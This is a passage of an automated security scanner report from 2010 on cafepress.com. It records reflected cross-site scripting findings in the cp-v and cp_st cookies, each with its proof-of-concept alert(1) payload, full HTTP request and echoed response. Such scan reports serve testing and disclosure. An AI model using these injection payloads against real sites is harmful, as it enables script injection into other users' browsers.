tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 58721
Date: Sun, 26 Dec 2010 13:47:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:13 GMT; path=/
Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:13 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'b770e</script><script>alert(1)</script>35f226fbd0'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.12. http://www.cafepress.com/+baby-bodysuits [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+baby-bodysuits

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd70c"-alert(1)-"1bb61056447 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+baby-bodysuits HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAdd70c"-alert(1)-"1bb61056447; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 59198
Date: Sun, 26 Dec 2010 13:47:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/
Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAdd70c"-alert(1)-"1bb61056447";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.13. http://www.cafepress.com/+baby-bodysuits [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+baby-bodysuits

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d208f</script><script>alert(1)</script>60e92653a56 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+baby-bodysuits HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d208f</script><script>alert(1)</script>60e92653a56; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59220
Date: Sun, 26 Dec 2010 13:47:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/
Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'd208f</script><script>alert(1)</script>60e92653a56'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.14. http://www.cafepress.com/+baby-hat [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+baby-hat

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50827"-alert(1)-"00860494a78 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+baby-hat HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA50827"-alert(1)-"00860494a78; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 58548
Date: Sun, 26 Dec 2010 13:47:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:22 GMT; path=/
Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:22 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA50827"-alert(1)-"00860494a78";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.15. http://www.cafepress.com/+baby-hat [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+baby-hat

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93433</script><script>alert(1)</script>a643f06e2bf was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+baby-hat HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=93433</script><script>alert(1)</script>a643f06e2bf; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 58578
Date: Sun, 26 Dec 2010 13:47:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:20 GMT; path=/
Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:20 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '93433</script><script>alert(1)</script>a643f06e2bf'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_0
...[SNIP]...

1.16. http://www.cafepress.com/+bags [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+bags

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ab65"-alert(1)-"48e2c7462b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+bags HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA4ab65"-alert(1)-"48e2c7462b; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 59555
Date: Sun, 26 Dec 2010 13:47:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:18 GMT; path=/
Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:18 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
